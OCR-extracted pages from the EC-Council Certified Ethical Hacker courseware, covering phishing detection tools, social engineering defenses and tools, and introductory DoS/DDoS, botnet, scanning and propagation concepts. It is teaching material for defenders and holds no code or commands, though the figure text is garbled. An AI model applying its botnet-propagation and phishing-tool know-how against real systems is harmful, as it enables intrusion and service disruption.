CEH {@ PhishTank is a collaborative clearing house for data
|
Phish and information about phishing onthe Internet| Tank | @ Itprovidesan open API for developers and | | researchers to integrate anti-phishing data into their apps
|
MeTCcRAFT
tps //unew phishtank com
Anti-Phishing Toolbar
=
Netcraft Source: https://www.netcraft.com
The Netcraft anti-phishing community is a giant neighborhood watch scheme, empowering the most alert and most expert members to defend everyone within the community against phishing attacks. The Netcraft Toolbar provides updated information about sites that users visit regularly and blocks dangerous sites. The toolbar provides a wealth of information about popular websites. This information will help to make an informed choice about the integrity of those sites. As shown in the screenshot, Netcraft phishing attacks and fraudsters.
Module 09 Page 1402
protects
individuals
and
organizations
from
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
XTi sterepottorhtpv/nmmcen X | SteSloctedNett Etenion +t O
Sy Extension (Net..ft Extension) moz-extension://71314a84-Of-4b32-Bfba-36cd9ee97 1 1f/bloc.
NETCRAFT Suspected Phishing een blocked by the Netcraft acked URL: hxxps: //smb
Details on suspect: x
>
nitpsy/wwwphishtankccom/phish.detailphp?phish id=740662«
©
c
+
+
FS
9
ome
x
PhishTank Home
Add APhish
Verify APhish
Phish Search
Stats
FAQ
Developers
Submission #7486626 is currently ONLINE
2022 10:1 AM by buaya (Current timer Apr 12th 2022 10:25 AM Submits https: //cssogrdtedadyrealpasssb.firebaseapp.com/
Mailing Lists My Account UTC)
As verified by
|
IsNOTa phish
Ed 0%
@ Godaddy
Figure 9.18: Screenshot of PhishTank Some additional tools to detect phishing attempts: =
Scanurl (https://scanurl.net)
=
Isitphishing (https://isitphishing.org)
=
ThreatCop (https://www.threatcop.ai)
=
e.Veritas (https://www.emailveritas.com)
=
Virustotal (https://www.virustotal.com)
Module 09 Page 1404
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Common Social Engineering Targets and Defense Strategies
(q E H
Impersonation, persuasion, intimidation, fake SMS, phone calls, and emails Impersonation, reverse social engineering, iggybacking, tailgating, etc. Shoulder surfing, eavesdropping, ingratiation, etc.
Train employees and help desk staff never to reveal passwords or other information over the phone. Enforce policies for the front office and help desk personnel Train technical support executives and system administrators never to reveal passwordsor other information over the phone or email Implement strict badge, token, or biometric authentication, ‘employee training, and security guards Implement employee training, best practices, and checklists for using passwords. Escort all guests
Impersonation, persuasion, intimidation
Educate vendors about social engineering Lock and monitor mail room, train employees
Company's a) Executives
Theft, damage, or forging of mails, ‘Attempting to gain access, remove equipment, and/or attach a protocol analyzer to extract confidential data Fake SMS, phone calls, and emails to grab confidential data
Dumpsters
Dumpster diving
Loe re
nane
Technical support and system administrators Perimeter securit a Office
Vendors of the target organization Mail room Machi hone closet oes
Common
Eavesdropping, shoulder surfing, impersonation, Persuasion, and intimidation
Keep phone closets, server rooms, etc. locked at all times and keep updated inventory on equipment Train executives never to reveal identity, passwords, or other confidential information over the phone or email Keep all trash in secured, monitored areas; shred important data; and erase magnetic media
Social Engineering Targets and Defense Strategies
Attackers implement various social engineering techniques to trick people into providing sensitive information about their organizations, thus helping attackers to launch malicious activities. These techniques are used on privileged individuals or those who deal with important information. Below table shows common social engineering targets, various social engineering techniques that attackers use, and the defense strategies to counter these attacks. Social Engineering Targets
Front office and help desk
Technical support and system administrators
Perimeter security
Module 09 Page 1405
Attack Techniques
Defense Strategies
Eavesdropping, shoulder surfing,
impersonation, persuasion, and intimidation
Impersonation, persuasion, intimidation, fake SMS, phone calls, and emails
Impersonation, reverse social
engineering, piggybacking, tailgating, etc.
Train employees and help desk staff never to reveal passwords or other information over the phone. Enforce policies for the front office and help desk personnel Train technical support executives and system administrators never to reveal passwords or other information over the phone or email Implement strict badge, token, or biometric authentication, employee
training, and security guards
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Office
Vendors of the
target organization Mail room
Machine room and Phone closet
Company’s P . Y Executives
Shoulder surfing,
eavesdropping, and ingratiation
Impersonation, persuasion, and
Exam 312-50 Certified Ethical Hacker
Implement employee training, best practices, and checklists for using passwords. Escort all guests Educate vendors about social
intimidation
engineering.
Theft, damage, or forging of mails
Lock and monitor the mailroom, train
Attempting to gain access, remove equipment, or attach a protocol analyzer to extract confidential data Fake SMS, phone calls, and
. . emails designed to grab 7 confidential data
employees Keep phone closets, server rooms, and
other spaces locked at all times and keep an updated inventory of equipment Train executives never to reveal identity,
. . passwords, or other confidential . F information over the phone or email Keep all trash in secured, monitored
Dumpsters
Dumpster diving
areas; shred important data; and erase magnetic media
Table 9.1: Common social engineering targets and defense strategies
Module 09 Page 1406
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Social Engineering Tools: Social Engineering Toolkit (SET) ‘SpeedPhish Framework (SPF) Itps://othabcom
|@ The Social-Engineer Toolkit (SET) is an open-source Python-driven tool aimed at penetration testing around social engineering EQ
Gophish
—
‘https://getgophish.com
[x]
King Phisher
fmt
https://github.com
LUCY SECURITY etps:/ fou lcysecurty.com
Ietes/Jruu trustedsec Com Copyright © by
MSI Simple Phish ‘etps://microsolved.com Al Rights Reserved. Reproduction is
Social Engineering Tools =
Social Engineering Toolkit (SET) Source: https://www.trustedsec.com The Social-Engineer Toolkit (SET) is an open-source Python-driven tool aimed at penetration testing via social engineering. It is a generic exploit designed to perform advanced attacks against human elements to compromise a target and make them offer sensitive information. SET categorizes attacks such as email, web, and USB attacks according to the attack vector used to trick humans. The toolkit attacks human weakness, exploiting the trusting, fearful, greedy, and the helpful nature of humans.
Module 09 Page 1407
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Figure 9.19: Screenshot of SET showing menu and attack options Some social engineering tools are listed below:
=
SpeedPhish Framework (SPF) (https://github.com)
=
Gophish (https://getgophish.com)
=
King Phisher (https://github.com)
=
LUCY SECURITY (https://www.lucysecurity.com)
=
MSI Simple Phish (https://microsolved.com)
Module 09 Page 1408
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Audit Organization's Security for Phishing Attacks using
OhPhish
C IE H
Pood both
|@ OhPhish is a web-based portal to test employees’
susceptibility to social engineering attacks
@ OhPhish is a phishing simulation tool that provides the organization with a
platform to launch phishing simulation campaigns on its employees
SHPHISH
Fortifying Front Lines >etps/portol.ohphish com
Audit Organization's Security for Phishing Attacks using OhPhish The primary objective of launching phishing campaigns against employees of the client organization is to assess the employees’ susceptibility to phishing attacks and help the organization reduce risks that arise when the employees fall prey to phishing attacks sent by cyber-threat actors.
OhPhish Source: https://portal.ohphish.com OhPhish is a web-based portal for testing employees’ susceptibility to social engineering attacks. It is a phishing simulation tool that provides the organization with a platform to launch phishing simulation campaigns on its employees. The platform captures the responses and provides MIS reports and trends (on a real-time basis) that can be tracked according to the user, department, or designation. OhPhish can be used to audit an organization’s security for phishing attacks various phishing methods such as Entice to Click, Credential Harvesting, Attachment, Training, Vishing, and Smishing.
Module 09 Page 1409
using Send
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Dashboard | OhPhish
Exam 312-50 Certified Ethical Hacker
x ‘ohphish.com,
20%
Dashboard
minute
To get th To get star Entice to Click
Send Attachment
Live Phishing Campaign: Campaign
Campsicn Tipe
Status
ed Training Started Stopped Scheduled Seat Clicked Compliance Crestor Action
Figure 9.20: Screenshot of OhPhish
Module 09 Page 1410
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Social Engineering
Exam 312-50 Certified Ethical Hacker
Module Summary a
Q
=
CE H
In this module, we have discussed the following:
> Social engineering concepts along with various kinds of social engineering attacks ,
>
Human-, computer-, and mobile-based social engineering techniques
> Insider threats and the various forms they can take > Impersonation on social networking sites > Identity theft and the various forms it can take
> Details of various countermeasures that can defend an organization against social engineering attacks, phishing attacks, insider threats, and identity theft Q
Inthe next module, we will see how attackers, as well as ethical hackers and penetration testers, perform DoS/DDoS attacks
Module Summary This module discussed social engineering concepts along with various phases of social engineering attack. It also discussed various human-based, computer-based, and mobile-based social engineering techniques. The module discussed insider threats, including the various types of insider threats. It gave an overview of impersonation on social networking sites. It also discussed identity theft and the types of identity theft. The module ended with a detailed discussion of various signs to watch for and countermeasures to employ in order to defend against social engineering attacks, phishing attacks, insider threats, and identity theft. The next module will show how attackers, as well as ethical hackers and pen testers, perform
DoS/DDoS attacks.
Module 09 Page 1411
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
C\EH
EC-Council
Certified |) Ethical Hacker
MODULE
10
— "DENIAL. OF- SFRVICE —
EC-COUNCIL OFFICIAE*CURRICULA
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
CEH
o
o
LEARNING
OBJECTIVES
LO#01: Summarize DoS/DDoS Concepts
©
LO#04: Present DDoS Case Study
LO#02: Explain Botnet Network
©
LO#05: Explain DoS/DDoS Attack Countermeasures
LO#03: Demonstrate Different DoS/DDoS Attack Techniques
Strictly Prohibited
Learning Objectives Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) attacks are a major threat to computer networks. These attacks attempt to make a machine or network resource unavailable to its authorized users. Usually, DoS/DDoS attacks exploit vulnerabilities in the implementation of the Transmission Control Protocol (TCP)/Internet Protocol (IP) model or bugs in a specific operating system (OS). At the end of this module, you will be able to do the following: =
Describe DoS/DDoS concepts
=
Describe botnets
=
Understand various DoS/DDoS attack techniques
=
Explain different DoS/DDoS attack tools
=
Illustrate DoS/DDoS case studies
=
Apply best practices to mitigate DoS/DDoS attacks
=
Apply various DoS/DDoS protection tools
Module 10 Page 1415
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
CEH
LO#01: Summarize DoS/DDoS Concepts
DoS/DDoS Concepts For a good understanding of DoS/DDoS attacks, one must be familiar with related concepts in advance. This section defines DoS and DDoS attacks and discusses how DDoS attacks work.
Module 10 Page 1416
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
What is a DoS Attack?
CE H
@ Denial-of-Service (DoS) is an attack on a computer or network that reduces, restricts,or prevents accessibility of system resources to its legitimate users @ Ina DoS attack, attackers flood the victim system with non-legitimate service requestsor traffic to overload its resources Malicious Traffic
& A
Regular Traffic
Malicious traffic consumes all the available bandwidth >.
attack
MEE
traffic
Regular Traffic
Server Cluster
What is a DoS Attack? A DoS attack is an attack on a computer or network that reduces, restricts, or prevents access to system resources for legitimate users. In a DoS attack, attackers flood a victim’s system with nonlegitimate service requests or traffic to overload its resources and bring down the system, leading to the unavailability of the victim’s website or at least significantly reducing the victim’s system or network performance. The goal of a DoS attack is to keep legitimate users from using the system, rather than to gain unauthorized access to a system or to corrupt data.
The following are examples for types of DoS attacks: =
Flooding the victim’s system with more traffic than it can handle
=
Flooding a service (e.g., Internet Relay Chat (IRC)) with more events than it can handle
=
Crashing a TCP/IP stack by sending corrupt packets
=
Crashing a service by interacting with it in an unexpected manner
=
Hanging a system by causing it to go into an infinite loop
Module 10 Page 1417
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
Malicious Traffic Malicious traffic consumes
all the available bandwidth
Internet (OD HE
Regular Traffic
Attack Traffic SRegular Traffic
Server Cluster
Figure 10.1: Schematic of a DoS attack
DoS attacks following:
have
various
forms
and
target various
services.
The
attacks
=
Consumption of resources
=
Consumption of bandwidth, disk space, CPU time, or data structures
=
Actual physical destruction or alteration of network components
=
Destruction of programming and files in a computer system
may
cause
the
In general, DoS attacks target network bandwidth or connectivity. Bandwidth attacks overflow the network with a high volume of traffic by using existing network resources, thereby depriving legitimate users of these resources. Connectivity attacks overflow a system with a large number of connection requests, consuming all available OS resources to prevent the system from processing legitimate user requests.
Consider a food catering company that conducts much of its business over the phone. If an attacker wants to disrupt this business, they need to find a way to block the company’s phone lines, which would make it impossible for the company to do business. A DoS attack works along the same lines—the attacker uses up all the ways to connect to the victim’s system, making legitimate business impossible.
DoS attacks are a kind of security breach that does not generally result in the theft of information. However, these attacks can harm the target in terms of time and resources. Furthermore, security failure might cause the loss of a service such as email. In the worst-case scenario, a DoS attack can cause the accidental destruction of the files and programs of millions of people who were connected to the victim’s system at the time of the attack.
Module 10 Page 1418
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
What is a DDoS Attack? ‘@
CE H
Distributed denial-of-service (DDoS) is a coordinated attack that involves a multitude of compromised systems (Botnet) attacking a single target, thereby denying service to users of the targeted system
infects Handlemnt sion the Internet
DDoS? How kedo Work Attsc
Impact of DDoS
attacker sets 2 Ie
@ Loss of Goodwill
handler system
@
Disabled Network
@
Financial Loss
@
Disabled Organization
cence raed tack
Handler
ar What is a DDoS Attack? Source: https://www.techtarget.com A DDoS attack is a large-scale, coordinated attack on the availability of services on a victim’s system or network resources, and it is launched indirectly through many compromised computers (botnets) on the Internet. As defined by the World Wide Web Security FAQ, “A distributed denial-of-service (DDoS) attack uses many computers to launch a coordinated DoS attack against one or more targets. Using client/server technology, the perpetrator is able to multiply the effectiveness of the denial of service significantly by harnessing the resources of multiple unwitting accomplice computers, which serve as attack platforms.” The flood of incoming messages to the target system essentially forces it to shut down, thereby denying service to legitimate users. The services under used to launch the performing a DDoS making it difficult to
attack belong to the “primary victim,” whereas the compromised systems attack are called “secondary victims.” The use of secondary victims in attack enables the attacker to mount a large and disruptive attack while track down the original attacker.
The primary objective of a DDoS attack is to as possible. In general, attackers use a vulnerable systems. After gaining access to DDoS software on these systems at the time
first gain administrative access on as many systems customized attack script to identify potentially the target systems, the attacker uploads and runs chosen to launch the attack.
DDoS attacks have become popular because of the easy accessibility of exploit plans and the negligible amount of brainwork required to execute them. These attacks can be very dangerous because they can quickly consume the largest hosts on the Internet, rendering them useless.
Module 10 Page 1419
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
The impacts of DDoS include the loss of goodwill, disabled organizations.
disabled
networks,
financial
losses, and
How do DDoS Attacks Work? In a DDoS attack, many applications barrage a target browser or network with fake exterior requests that make the system, network, browser, or site slow, useless, and disabled or unavailable. The attacker initiates the DDoS attack by sending a command to zombie agents, which are Internet-connected computers compromised by an attacker through malware programs to perform various malicious activities through a command and control (C&C) server. These zombie agents send a connection request to a large number of reflector systems with the spoofed IP address of the victim, which causes the reflector systems to presume that these requests originate from the victim’s machine instead of the zombie agents. Hence, the reflector systems send the requested information (response to the connection request) to the victim. Consequently, the victim’s machine is flooded with unsolicited responses from several reflector computers simultaneously, which may either reduce the performance or cause the victim’s machine to shut down completely. Handler
infects
a large numberof
computers over the Internet
Attacker
sets a
handler system
Poy.)
Zombie systems are instructed to attack a target server
DEERE
Compromised PCs (Zombies) Figure 10.2: Schematic of a DDoS attack
Module 10 Page 1420
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
CEH
LO#02: Explain Botnet Network
Botnets The term “bot” is a contraction of “robot” and refers to software applications that run automated tasks over the Internet. Attackers use bots to infect a large number of computers that form a network, or “botnet,” allowing them to launch DDoS attacks, generate spam, spread viruses, and commit other types of crime. This section deals with organized cyber-crime syndicates, organizational charts, botnets, and botnet propagation techniques; botnet ecosystems; scanning methods for finding vulnerable machines; and the propagation of malicious code.
Module 10 Page 1421
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
Organized Cyber Crime: Organizational Chart Criminal Boss
Hierarchical Setup
Underboss: Trojan Provider and ‘Managerof Trojan Command and Control
‘Attackers (Crimeware Toolkit Owners)
a> wansser Affiliation Network
@.:
oe
Data Reseller
CE H
a>¥ vege
t Affiliation Network
3
Qa.
@.%
r~) Stolen Data Reseller
@
Stolen Data Reseller
Copyright © by
Organized Cyber Crime: Organizational Chart Organized Crime Syndicates While cyber criminals worked independently in the past, they now tend to operate in organized groups. They are increasingly associated with organized crime syndicates and take advantage of the sophisticated techniques of these syndicates to engage in illegal activity, usually for monetary benefit. There are organized groups of cyber criminals who work in a hierarchical set up with a predefined revenue-sharing model, which is a kind of major corporation that offers criminal services. Organized groups create and rent botnets and offer various services ranging from the development of malware and hacking of bank accounts to the deployment of massive DoS attacks against any target for a price. For example, an organized crime syndicate might perform a DDoS attack against a bank to divert the attention of the bank’s security team while they clean out bank accounts with stolen account credentials. The growing involvement of organized criminal syndicates in politically motivated cyber warfare and hacktivism is a matter of concern for national security agencies. Cybercrime features a complicated range of players, and cyber criminals are paid according to the task they perform or the position they hold. The head of the cybercrime organization (i.e., the boss) acts as a business entrepreneur. The boss does not commit any crimes directly. Immediately below the boss in the organizational hierarchy is the “underboss,” who sets up a C&C server and crimeware toolkit database to manage the implementation of attacks and provide Trojans. Below the underboss are various “campaign managers” with their own affiliation networks for implementing attacks and stealing data. Finally, resellers sell the stolen
data.
Module 10 Page 1422
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
ez
Hierarchical Setup
Criminal Boss
v
Underboss: Trojan Provider and Manager of Trojan Command and Control
Attackers (Crimeware Toolkit Owners)
v
Campaign Manager
Campaign Manager
v
“@* > Affiliation Network
pend Aliliation Network
£a8
Alilation Network
v
@ Stolensai Data Reseller r="
2 Stolen . Data Reseller r=" Figure 10.3:
Module 10 Page 1423
2...Stolen Data Reseller r~"
jierarchical setup of a cybercrime organization
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
Botnets ‘@ ©@ A
CE H
Bots are software applications that run automated tasks over the Internet and perform simple, repetitive tasks, such as web spidering and search engine indexing
j
botnet is a huge network of compromised systems and can be used by an attacker to launch
denial-of-service attacks
Bots connectto C&C
=
Bo SMe Gla|
SO iiiaeesnie control Center “> Dn } c&Chandler
Bot Command and
Attacker
>
3
> Zombies
Target Server
=?
Bot looks for other vulnerable systemsand infects them to create Botnet
Victim (Bot)
Botnets
Bots are used for benign data collection or data mining activities, such as “web spidering,” as well as to coordinate DoS attacks. The main purpose of a bot is to collect data. There are different types of bots, such as Internet bots, IRC bots, and chatter bots. Examples for IRC bots are Cardinal, Sopel, Eggdrop, and EnergyMech. A botnet (a contraction of “roBOT NETwork”) is a group of computers “infected” by bots; however, botnets can be used for both positive and negative purposes. As a hacking tool, a botnet is composed of a huge network of compromised systems. A relatively small botnet of 1,000 bots has a combined bandwidth larger than the bandwidth of most corporate systems. The advent of botnets led to an enormous increase in cybercrime. Botnets form the core of the cybercriminal activity center that links and unites various parts of the cybercriminal world. Cybercriminal service suppliers are a part of a cybercrime network. They offer services such as malicious code development, bulletproof hosting, the creation of browser exploits, and encryption and packing. Malicious code is the primary tool used by criminal organizations to commit cybercrimes. Botnet owners order both bots and other malicious programs such as Trojans, viruses, worms, keyloggers, and specially crafted applications to attack remote computers via networks. Developers offer malware services on public sites or closed Internet resources.
Botnets are agents that an intruder can send to a server system to perform an illegal activity. Botnets run hidden programs that allow the identification of system vulnerabilities. Attackers can use botnets vulnerabilities.
Module 10 Page 1424
to
perform
the
tedious
tasks
involved
in
probing
a
system
for
known
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
Attackers can use botnets to perform the following: DDoS attacks: Botnets can generate DDoS attacks, which consume the bandwidth of the victim’s computers. Botnets can also overload a system, wasting valuable host system resources and destroying network connectivity. Spamming: Attackers use a SOCKS proxy for spamming. They harvest email addresses from web pages or other sources. Sniffing traffic: A packet sniffer observes the data traffic entering a compromised machine. It allows an attacker to collect sensitive information such as credit card numbers and passwords. The sniffer also allows an attacker to steal information from one botnet and use it against another botnet. In other words, botnets can rob one another. Keylogging: Keylogging is a method of recording the keys typed on a keyboard, and it provides sensitive information such as system passwords. Attackers use keylogging to harvest account login information for services such as PayPal. Spreading new malware: Botnets can be used to spread new bots.
Installing advertisement add-ons: Botnets can be used to perpetrate a “click fraud” by automating clicks. Google AdSense abuse: Some companies permit showing Google AdSense ads on their websites for economic benefits. Botnets allow an intruder to automate clicks on an ad, producing a percentage increase in the click queue. Attacks on IRC chat networks: Also called clone attacks, these attacks are similar to a DDoS attack. A master agent instructs each bot to link to thousands of clones within an IRC network, which can flood the network.
Manipulating online polls and games: Every botnet has a unique address, enabling it to manipulate online polls and games. Mass identity theft: Botnets can send a large number of emails while impersonating a reputable organization such as eBay. This technique allows attackers to steal information for identity theft. The below figure illustrates how an attacker launches a botnet-based DoS attack on a target server. The attacker sets up a bot C&C center, following which they infect a machine (bot) and compromises it. Later, they use this bot to infect and compromise other vulnerable systems available in the network, resulting in a botnet. The bots (also known as zombies) connect to the C&C center and awaits instructions. Subsequently, the attacker sends malicious commands to the bots through the C&C center. Finally, as per the attacker’s instructions, the bots launch a DoS attack on a target server, making its services unavailable to legitimate users in the network.
Module 10 Page 1425
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
Bots connect to C&C handler and wait for instructions Attacker sends commands to the
Bot Command and
bots throwgh CRC
Control Center
Target Server
A
Setsa bot cac handler e Attacker
Attacker infects a machine
Bot looks for other vulnerable systems and infects them to create Botnet
Victim (Bot) Figure 10.4: Botnet-based DDoS attack
Module 10 Page 1426
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Exam 312-50 Certified Ethical Hacker
Denial-of-Service
Compromise
| legitimorate | ne sei cious | ebste “agmal
phiching/ocal {
eatenew
iA
ATypical Botnet Setup
x=
Ethical Hacking and Countermeasures
Toolkit database
website
acious redbecsure tothe
Molicious Website/Compromised Legitimate Website
Users visit the eacticionsy compromised legitimate website
x
A Typical Botnet Setup Affiliation Network
Attacker
Sets a C&C center and Crimeware Toolkit database
Compromise Redirect vicins tomatcne | wepste leitaor website using
phishing/social ; “Teetenew ‘malicious
engineering, o nel
i, te
Bots will
anee Go)@
website
Malicious
Website/Compromised
Web mate ise
Malicious Websites
connect
5
Users visit the
‘Attacks the primary target
malicious/ d te omise compr legitimate websi
Organization Figure 10.5: Typical botnet setup
Module 10 Page 1427
Ethical Hacking and Countermeasures Copyright © by EC-Cot All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
Botnet Ecosystem
=e =—
I$: Ucenses MP3, Divx
Phishing
Ccrimeware Toolkit Database
Financial Diversion
Trojan Command ‘and Control Center Client Side Vulnerability
—s
Malware Market
Extortion
&
H
&
Qa Stock Fraud
Redirect,
Spam Mass Malling
+
a
Oo) Scams
Adverts
Figure 10.6: Botnet ecosystem
Module 10 Page 1428
Ethical Hacking and Countermeasures Copyright © by EC-Col All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
Scanning Methods for Finding Vulnerable Machines
CE H
Random Scanning
|@ The infected machine probes IP addresses randomly from the target network IP range and checks for vulnerabilities
Hit-list Scanning
@ Anattacker first collects a list of potentially vulnerable machines and then scans them to find vulnerable machines
Topological Scanning
@ Ituses information obtained from an infected machine to find new vulnerable machines
Subnet Local Scanning
|@ The infected machine looks for new vulnerable machines in its own local network
Permutation Scanning
@ Ituses a pseudorandom permutation list of IP addresses to find new vulnerable machines
Scanning Methods for Finding Vulnerable Machines Discussed network:
below are scanning methods
used by an attacker to find vulnerable machines in a
Random Scanning In this technique, the infected machine (an attacker’s machine or a zombie) probes IP addresses randomly in the target network’s IP range and checks their vulnerability. On finding a vulnerable machine, it hacks and attempts to infect the vulnerable machine by installing the same malicious code installed on it. This technique generates significant traffic because many compromised machines probe and check the same IP addresses. Malware propagates quickly in the initial stage, and the speed of propagation reduces as the number of new IP addresses available decreases with time.
Hit-list Scanning Through scanning, an attacker first collects a list of potentially vulnerable machines and then creates a zombie army. Subsequently, the attacker scans the list to find a vulnerable machine. On finding one, the attacker installs malicious code on it and divides the list in half. The attacker continues to scan one half, whereas the other half is scanned by the newly compromised machine. This process keeps repeating, causing the number of compromised machines to increase exponentially. This technique ensures the installation of malicious code on all the potentially vulnerable machines in the hit list within a short time.
Module 10 Page 1429
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
Topological Scanning This technique uses the information obtained from an infected machine to find new vulnerable machines. An infected host checks for URLs in the hard drive of a machine that it wants to infect. Subsequently, it shortlists URLs and targets, and it checks their vulnerability. This technique yields accurate results, and its performance is similar to that of the hit-list scanning technique. Local Subnet Scanning In this technique, an infected machine searches for new vulnerable machines in its local network, behind a firewall, by using the information hidden in the local addresses. Attackers use this technique in combination with other scanning mechanisms. Permutation Scanning
In this technique, attackers share a common pseudorandom permutation list of IP addresses of all machines. The list is created using a block cipher of 32 bits and a preselected key. If a compromised host is infected during either hit-list scanning or local subnet scanning, the list is scanned from immediately after the point of the compromised host to identify new targets. If a compromised host is infected during permutation scanning, scanning restarts from a random point. If an already infected machine is encountered, scanning restarts from a new random start point in the permutation list. The process of scanning stops when the compromised host consecutively encounters a predefined number of already infected machines and fails to find new targets. Thereafter, a new permutation key is generated to initiate a new scanning phase. Permutation scanning has the following advantages: o
The reinfection of a target is avoided.
o
New targets are scanned at random, thereby ensuring a high scanning speed.
Module 10 Page 1430
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
How Does Malicious Code Propagate?
(q E H
Attackers use three techniques to propagate malicious code to newly discovered vulnerable systems Attackers placean attack toolkiton the central source, anda copy of the attack toolkitis transferred to the newly discovered vulnerable system
Central Source Propagation /
Next Victim
Copy Code i
*roveoations
Next Victim The attacking host itself transfers the
attack toolkitto the newly discovered
Autonomous
vulnerable system at the exact time
the attack toolkitis transferred to
the newly discovered vulnerable system
NU sap
Propagation
that it breaks into that system
An attacker placesan attack toolkit on his/her own system, anda copyof
Code
ne oe
_
How Does Malicious Code Propagate? Discussed below are three techniques build attack networks: =
used by an attacker to propagate
malicious code and
Central Source Propagation
In this technique, the attacker places an attack toolkit on a central source and a copy of the attack toolkit is transferred to a newly discovered vulnerable system. Once the attacker finds a vulnerable machine, they instruct the central source to transfer a copy of the attack toolkit to the newly compromised machine, on which attack tools are automatically installed under management by a scripting mechanism. This initiates a new attack cycle, in which the newly infected machine searches for other vulnerable machines and repeats the process to install the attack toolkit. In general, this technique uses HTTP, FTP, and RPC protocols.
Central Source
Qt,
Attacker
ml
B=
Qos.
Victim
v7
=
Next Victim
Figure 10.7: Central source propagation
Module 10 Page 1431
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
=
Exam 312-50 Certified Ethical Hacker
Back-chaining Propagation In this technique, the attacker places an attack toolkit on their own system, and a copy of the attack toolkit is transferred to a newly discovered vulnerable system. The attack tools installed on the attacking machine use some special methods to accept a connection from the compromised system and then transfer a file containing the attack tools to it. Simple port listeners containing a copy of this file or full intruder-installed web servers, both of which use the Trivial File Transfer Protocol (TFTP), support this back-channel file copy. Copy Code
Repeat
seeeeeeeeeees>
Attacker
@:.
errr
Victim
—
ao
Next Victim
Figure 10.8: Back-chaining propagation
=
Autonomous Propagation Unlike the previously discussed mechanisms, in which an external file source transfers the attack toolkit, in autonomous propagation, the attacking host itself transfers the attack toolkit to a newly discovered vulnerable system, exactly at the time it breaks into that system. Exploit and Code
Attacker
>
Victim
Next Victim
Figure 10.9: Autonomous Propagation
Module 10 Page 1432
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
CEH
LO#03: Demonstrate Different DoS/DDoS Attack Techniques
